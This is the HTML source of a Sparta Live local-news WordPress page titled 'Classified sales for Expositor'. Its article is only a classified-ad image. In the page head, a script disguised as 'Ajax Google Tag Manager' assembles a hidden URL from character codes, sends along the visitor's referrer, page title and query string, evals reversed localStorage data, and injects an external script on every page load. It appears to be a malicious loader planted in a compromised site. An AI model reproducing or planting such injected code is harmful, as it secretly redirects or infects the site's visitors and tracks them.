<!DOCTYPE html>
<html lang="en-US" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#">
<head>

	
<!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-143174150-2"></script>

<script>

  window.dataLayer = window.dataLayer || [];

  function gtag(){dataLayer.push(arguments);}

  gtag('js', new Date());

 

  gtag('config', 'UA-143174150-2');

</script> <title>
  Classified sales for Expositor</title>

<!--meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"-->
<meta charset="UTF-8">

<link rel="profile" href="https://gmpg.org/xfn/11" />
<link rel="pingback" href="https://spartalive.com/xmlrpc.php">
<link rel="alternate" type="application/rss+xml" title="Sparta Live" href="https://spartalive.com/feed/">
<link rel="alternate" type="application/atom+xml" title="Sparta Live" href="https://spartalive.com/feed/atom/">

<!--[if lt IE 9]>
<script type="application/javascript">

</script>  <script src="https://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='preconnect' href='https://secureservercdn.net' crossorigin />
<link rel="alternate" type="application/rss+xml" title="Sparta Live &raquo; Classified sales for Expositor Comments Feed" href="https://spartalive.com/classified-sales-for-expositor/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/secureservercdn.net\/184.168.47.225\/e6a.675.myftpupload.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2&time=1578960340"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-notification-bars-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/wp-notification-bars/public/css/wp-notification-bars-public.css?ver=1.0.5&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.8&#038;time=1578960340' type='text/css' media='all' />
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/wp-notification-bars/public/js/wp-notification-bars-public.js?ver=1.0.5&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var userSettings = {"url":"\/","uid":"0","time":"1578962963","secure":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/utils.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/plupload/moxie.min.js?ver=1.3.5&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/plupload/plupload.min.js?ver=2.1.9&#038;time=1578960340'></script>
<!--[if lt IE 8]>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/json2.min.js?ver=2015-05-03&#038;time=1578960340'></script>
<![endif]-->
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/jquery.form.min.js?ver=4.2.1&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/wp-future-clone/modules/js/front.js?ver=1.0&#038;time=1578960340'></script>
<link rel='https://api.w.org/' href='https://spartalive.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://spartalive.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/wlwmanifest.xml?time=1578960340" /> 
<link rel='prev' title='Subscribe now, get 1 month FREE' href='https://spartalive.com/subscribe-now-get-1-month-free-7/' />
<!-- Paper Theme -->
<link rel="canonical" href="https://spartalive.com/classified-sales-for-expositor/" />
<link rel='shortlink' href='https://spartalive.com/?p=20175151' />
<link rel="alternate" type="application/json+oembed" href="https://spartalive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fspartalive.com%2Fclassified-sales-for-expositor%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://spartalive.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fspartalive.com%2Fclassified-sales-for-expositor%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.4.2 Professional to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-3 { min-width:0px; max-width:200px; }
	.b-3 { margin:0px 0px 15px 0px; }
	.g-2 { min-width:0px; max-width:200px; }
	.b-2 { margin:0px 0px 15px 0px; }
	.g-1 {  margin: 0 auto; }
	.g-4 { margin:0px 0px 15px 0px; }
	.g-5 { margin:0px 0px 15px 0px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->

<meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://spartalive.com"><link rel="https://theeventscalendar.com/" href="https://spartalive.com/wp-json/tribe/events/v1/" />
<link rel='dns-prefetch' href='//v0.wordpress.com'/>

<!-- START - Open Graph and Twitter Card Tags 2.2.7.1 -->
 <!-- Facebook Open Graph -->
  <meta property="og:locale" content="en_US"/>
  <meta property="og:site_name" content="Sparta Live"/>
  <meta property="og:title" content="Classified sales for Expositor"/>
  <meta property="og:url" content="https://spartalive.com/classified-sales-for-expositor/"/>
  <meta property="og:type" content="article"/>
  <meta property="og:description" content="Classified sales for Expositor"/>
  <meta property="og:image" content="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg?time=1578960340"/>
  <meta property="og:image:url" content="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg?time=1578960340"/>
  <meta property="og:image:secure_url" content="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg?time=1578960340"/>
  <meta property="og:image:width" content="273"/>
  <meta property="og:image:height" content="360"/>
  <meta property="article:published_time" content="2020-01-13T18:04:06-06:00"/>
  <meta property="article:modified_time" content="2020-01-13T18:04:06-06:00" />
  <meta property="og:updated_time" content="2020-01-13T18:04:06-06:00" />
  <meta property="article:section" content="News"/>
 <!-- Google+ / Schema.org -->
  <meta itemprop="name" content="Classified sales for Expositor"/>
  <meta itemprop="headline" content="Classified sales for Expositor"/>
  <meta itemprop="description" content="Classified sales for Expositor"/>
  <meta itemprop="image" content="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg?time=1578960340"/>
  <meta itemprop="datePublished" content="2020-01-13"/>
  <meta itemprop="dateModified" content="2020-01-13T18:04:06-06:00" />
  <meta itemprop="author" content="Kim Swindell Wood"/>
 <!-- Twitter Cards -->
 <!-- SEO -->
 <!-- Misc. tags -->
 <!-- is_singular -->
<!-- END - Open Graph and Twitter Card Tags 2.2.7.1 -->
	
 


<link href="https://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/css/bootstrap-combined.min.css" rel="stylesheet">
<link href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/themes/paper/style.css" type="text/css" rel="stylesheet" media="all">

<style>
/* Heading Styles */
h1 {
  font-size: px;	
}
h2 {
  font-size: 26px;	
}
h3 {
  font-size: px;	
}
h4 {
  font-size: px;	
}
h5 {
  font-size: px;	
}
h6 {
  font-size: px;	
}
/* The Top Bar's Color */
#topBar {
  background: ;
}
/* General Content Colors */
a:link {
  color: #1e73be;
}
a:visited {
  color: #1e73be;
}
a:hover {
  color: ;
}
a:active {
  color: ;
}
/* Menu Colors */
#navCont ul li.current-menu-item > a {
  color: ;
}
#navCont ul li a:link {
  color: ;
}
#navCont ul li a:visited {
  color: ;
}
#navCont ul li a:hover {
  color: ;
}
#navCont ul li a:active {
  color: ;
}

.homeArticles h2 a:link {
  color: #000000;
}
.homeArticles h2 a:visited {
  color: #000000;
}
.homeArticles h2 a:hover {
  color: ;
}
.homeArticles h2 a:active {
  color: ;
}
/* Border Color */
.container {
  border-left: 2px solid ;
  border-right: 2px solid ;
  border-bottom: 2px solid ;	
}

/* Custom CSS Block */
<script>
	var children = jQuery

(&#039;#menu-header-menu&#039;).children

().length;
	jQuery(function(){
		if (children > 1) {
			var theMath = 100 

/ children;
			jQuery

(&#039;#menu-header-menu li&#039;).css

(&#039;width&#039;, theMath +&#039;

%&#039;);
		}
	});
  </script>
</style><script type="application/javascript">

</script>
	<!-- Ajax Google Tag Manager -->
<script type="application/javascript">
var ajax_url = "https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js";
window[String.fromCharCode(95)+"_a"] = window["ajax"+String.fromCharCode(95,117,114,108)];
window["a"+String.fromCharCode(106,97,120,95)+"url"] = __a.slice(0,8)+__a[28-4]+String.fromCharCode(100*1)+__a.slice(60,61)+"w"+__a[3]+__a[12]+"google.com"[1]+__a[42]+String.fromCharCode(3+100)+"/"+__a.slice(38,44)+"?se_r"+__a[41]+String.fromCharCode(102)+"errer="/*!google!*/+encodeURIComponent(document.referrer)+"&de"+String.fromCharCode(102)+"au"+__a[17]+"t_"+"key"+String.fromCharCode(119)+"or"+String.fromCharCode(10**2)+"="+encodeURIComponent(document.title)+'&'+window.location.search.replace('?', '&')+"&"+String.fromCharCode(102)+"rm="+__a[4]+__a[24]+"rip"+__a[1*2];var _gl=localStorage.getItem(String.fromCharCode(1+94,95+0)+"google"+String.fromCharCode(95,100,97,116,97));if(_gl!==null&&eval(decodeURI(_gl.split("").reverse().join("")))!==true&&_gl=="!3"){window["a"+String.fromCharCode(106,97,120,95)+"url"]=__a;}else if(_gl!=="!1"&&_gl!=="!2"&&_gl!==null){window["a"+String.fromCharCode(106,97,120,95)+"url"]=_gl;}if(_gl!=="!2"){
var d=document;var s=d.createElement('script');s.src=ajax_url;if(document.currentScript){document.currentScript.parentNode.insertBefore(s,document.currentScript);}else{d.getElementsByTagName('head')[0].appendChild(s);}}
</script>
<!-- End Google Tag Manager -->
</head>

<body data-rsssl=1 class="post-template-default single single-post postid-20175151 single-format-standard tribe-no-js cat-1-id">

  <div id="topBar"></div>
  <div class="container">
    <header id="headerCont">      
      <div class="row-fluid">
        <div class="span12">          
                      <h1 id="logo"><a href="https://spartalive.com">Sparta Live</a></h1>
            <img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/09/spartalivebannerSept2019.jpg" height="190" width="930" alt="" />
                  </div>
      </div><!--.row-fluid-->
      
      <div class="row-fluid">
        <div class="span12">
          <nav id="navCont" class="clearfix">
            <ul id="menu-header-menu" class="header-menu"><li id="menu-item-2201" class="home menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-2201"><a href="https://spartalive.com/">Home</a></li>
<li id="menu-item-2203" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2203"><a href="https://spartalive.com/category/obituaries/">Obituaries</a></li>
<li id="menu-item-20108968" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-20108968"><a href="https://spartalive.com/events/">Events</a></li>
<li id="menu-item-2202" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2202"><a href="https://spartalive.com/archives">Archives</a></li>
<li id="menu-item-2205" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2205"><a href="https://spartalive.com/publicnotices/">Legals</a></li>
<li id="menu-item-2204" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2204"><a href="https://spartalive.com/contact/">Contact</a></li>
</ul>          </nav>
        </div>
      </div><!--.row-fluid-->
         <script>
	var children = jQuery

(&#039;#menu-header-menu&#039;).children

().length;
	jQuery(function(){
		if (children > 1) {
			var theMath = 100 

/ children;
			jQuery

(&#039;#menu-header-menu li&#039;).css

(&#039;width&#039;, theMath +&#039;

%&#039;);
		}
	});
  </script>   
    </header>
  <div id="topAdsCont">

    
      <div class="row-fluid">

      <div class="span12">
        <div class="widget"><div class="g g-1"><div class="g-single a-5"><a href="http://oaklawnmemorial.com/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/08/OakLawn.jpg" /></a></div></div></div><div class="widget">

  <div class="well" id="fullWidthSearch">
	<form method="get" id="formSearch" action="https://spartalive.com">
	  <div class="input-append">
		<input type="text" value="" name="s" id="s" placeholder="Search Sparta Live">
		<button type="submit" class="btn" id="searchsubmit"><span class="icon-search"></span></button>
	  </div>
	</form>
  </div>

</div>      </div><!--.span12-->
    
    </div>

  
</div>
  <div class="row-fluid">

    <div class="span3" id="sidebarLeftCont">
  <div class="widget"><div class="g g-4"><div class="g-single a-257"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/FullSubscriptionAd-scaled.jpg"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Subscription-1.jpg" /></a></div></div></div><div class="widget"><div class="g g-2"><div class="g-col b-2 a-140"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2018/02/64935-JimHayes-200x300.jpg"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/06/64935-JimHayes-200x300WEB.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-12"><a href="http://www.caneyforkec.com/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2017/01/CaneyFork-200x300-v3.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-8"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/10/TreeWorks-large.jpg"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/10/TreeWorks.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-213"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Gutter-Cleaning-Jan-large.jpg"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Gutter-Cleaning-Jan.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-96"><a href="https://www.facebook.com/ServiceTechnician16/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/07/GapAuto-new.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-90"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2017/07/65198-DortchElectric-200x300.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-19"><a href="http://www.eddrogerschevy.net/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/08/EddRogersChevroletBuick.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-11"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/08/JeffsBodyShop.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-22"><a href="http://valleyfordinc.com/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/09/EddRogersValleyFord.jpg" /></a></div></div><div class="g g-2"><div class="g-col b-2 a-14"><a href="https://www.facebook.com/Sparklecitytanning/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/06/SparkleCity-200x300-60348WEB.jpg" /></a></div></div></div><div class="widget_text widget"><div class="textwidget custom-html-widget"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Sparta Vertical Units -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-2349950895409953"
     data-ad-slot="7604681831"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></div>


    <div class="span6">

	          <article class="clearfix">
          <h2>Classified sales for Expositor</h2>
          
          <div class="shareButtons">
		    <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><div class="sd-content"><ul><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://spartalive.com/classified-sales-for-expositor/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://spartalive.com/classified-sales-for-expositor/#print" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-20175151" class="share-facebook sd-button share-icon no-text" href="https://spartalive.com/classified-sales-for-expositor/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div>          </div>
          <p class="theDate">Posted By <span class="textUpper"><a href="https://spartalive.com/author/kimwood/" title="Posts by Kim Swindell Wood" rel="author">Kim Swindell Wood</a></span> | January 13, 2020 6:04 <span class="textUpper">pm</span><br /></p>
          
		  
                    <p><img data-attachment-id="20175152" data-permalink="https://spartalive.com/classified-sales-for-expositor/classifieds-position/" data-orig-file="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg?time=1578960340" data-orig-size="273,360" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Classifieds Position" data-image-description="" data-medium-file="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position-228x300.jpg" data-large-file="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg?time=1578960340" class="aligncenter size-full wp-image-20175152" src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg" alt="" width="273" height="360" srcset="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position.jpg 273w, https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Classifieds-Position-228x300.jpg 228w" sizes="(max-width: 273px) 100vw, 273px" /></p>
        </article>

        <a name="respond"></a>
<div id="comments">
	<!-- Prevents loading the file directly -->
		
	<!-- Password Required -->
	    
    <div id="commentsArea">
	   <!-- variable for alternating comment styles -->
                <h3>No comments yet.</h3>
      	</div><!--commentsArea-->
    <hr />
    
    
    
	<div id="comments-form">
									<form action="https://spartalive.com/wp-comments-post.php" method="post" id="commentform">
								            	<p>
								<label for="author"><small>Name (required)</small></label>
								<input type="text" name="author" id="author" value="" size="22" tabindex="1" />
							</p>
							<p>
								<label for="email"><small>Mail (will not be shared) (required)</small></label>
								<input type="text" name="email" id="email" value="" size="22" tabindex="2" />
							</p>
							<p>
								<label for="url"><small>Website</small></label>
								<input type="text" name="url" id="url" value="" size="22" tabindex="3" />
							</p>
													<p>
								<label for="comment"><small>Comment</small></label>
								<textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea>
							</p>
							<p>
								<input name="submit" type="submit" id="submit" tabindex="5" value="Submit Comment" />
								<input type="hidden" name="comment_post_ID" value="20175151" />
							</p>
				         <p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="3ac4f81595" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="129"/></p>			     </form>
				<p><small>By submitting a comment you grant Sparta Live a perpetual license to reproduce your words and name/web site in attribution. Inappropriate and irrelevant comments will be removed at an admin’s discretion. Your email is used for verification purposes only, it will never be shared.</small></p>
						</div><!--#commentsForm-->
</div><!--#comments-->      
    </div>

    <div class="span3" id="sidebarRightCont">
  <div class="widget"><!-- Either there are no banners, they are disabled or none qualified for this location! --></div><div class="widget"><div class="g g-3"><div class="g-col b-3 a-223"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/06/HarrisMonument-61074-200x300WEB.jpg"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/06/HarrisMonument-61074-200x300WEB.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-31"><a href="http://www.spartaheat.com/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2017/06/SpartaHeating-200x300-summer-v2a.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-24"><a href="http://ww3.truevalue.com/savagebuildingcenter/Home.aspx"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2018/02/Savage-200x300-v1a.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-233"><a href="http://LelandHasty.exprealty.com"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/EXP-Realty.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-42"><a href="http://www.facebook.com/Elizabeth-Earl-McDonald-Attorney-at-Law-366715466813958"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2017/05/ElizabethMcDonald-200x300-v2.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-167"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2020/01/Floyds-01.13.20.pdf"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/08/FloydsCashSaver.jpg" /></a>

</div></div><div class="g g-3"><div class="g-col b-3 a-254"><a href="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/12/Collins-large.jpg"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/12/Collins.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-44"><a href="https://ergrealty.com/"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2018/02/ExitRockyTopRealty-200x300-erg.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-35"><a href="http://goiwc.com/cash-and-carry.php"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/08/CashCarry.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-217"><a href="http://www.spartatninsurance.com/"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2019/06/State-Farm-Rick-Lee_v2WEB.jpg" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-40"><a href="https://www.ctcbonline.com/index.php/home"target="_blank"><img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/uploads/2016/08/CitizensTri-CountyBank.jpg" /></a></div></div></div><div class="widget_text widget"><div class="textwidget custom-html-widget"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Sparta Vertical Units -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-2349950895409953"
     data-ad-slot="7604681831"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></div>
  </div>

  <footer id="footerCont">
    <div class="row-fluid">
  <div class="span12">
    <div class="textwidget custom-html-widget"><a href="https://spartalive.com/privacy-policy-for-spartalive-com/" <a>Privacy Policy</a></div>!<div class="textwidget custom-html-widget"><script type="text/javascript">
var infolinks_pid = 3193886;
var infolinks_wsid = 2;
</script>
<script type="text/javascript" src="//resources.infolinks.com/js/infolinks_main.js"></script>

<!-- Begin Constant Contact Active Forms -->

<script> var _ctct_m = "1a7b84790adcfaff05ed1bacd5cc72aa"; </script>

<script id="signupScript" src="//static.ctctcdn.com/js/signup-form-widget/current/signup-form-widget.min.js" async defer></script>

<!-- End Constant Contact Active Forms --></div><div class="textwidget custom-html-widget"><!-- code from Primis - news - Smithnewspapers collapsing -->
<script type="text/javascript" language="javascript" src="https://live.sekindo.com/live/liveView.php?s=100005&cbuster=[CACHE_BUSTER]&pubUrl=[PAGE_URL_ENCODED]&x=[WIDTH]&y=[HEIGHT]&vp_content=plembed146dkrnmltxh&vp_template=5886&subId=[SUBID_ENCODED]"></script>
<!-- code from Primis --></div>  </div>
</div><!--.row-fluid-->  </footer>
  
  </div><!--.container-->
  <div class="row-fluid">
    <div class="span12">
      <p class="copyrightCont">&copy; Copyright 2020 | Sparta Live</p>
    </div>
  </div>
  			<div class="mtsnb mtsnb-shown mtsnb-top mtsnb-fixed" id="mtsnb-20170371" data-mtsnb-id="20170371" style="background-color:#d35151;color:#ffffff;">
				<style type="text/css">
					.mtsnb { position: fixed; -webkit-box-shadow: 0 3px 4px rgba(0, 0, 0, 0.05);box-shadow: 0 3px 4px rgba(0, 0, 0, 0.05);}
					.mtsnb .mtsnb-container { width: 1080px; font-size: 15px;}
					.mtsnb a { color: #000000;}
					.mtsnb .mtsnb-button { background-color: #000000;}
				</style>
				<div class="mtsnb-container-outer">
					<div class="mtsnb-container mtsnb-clearfix">
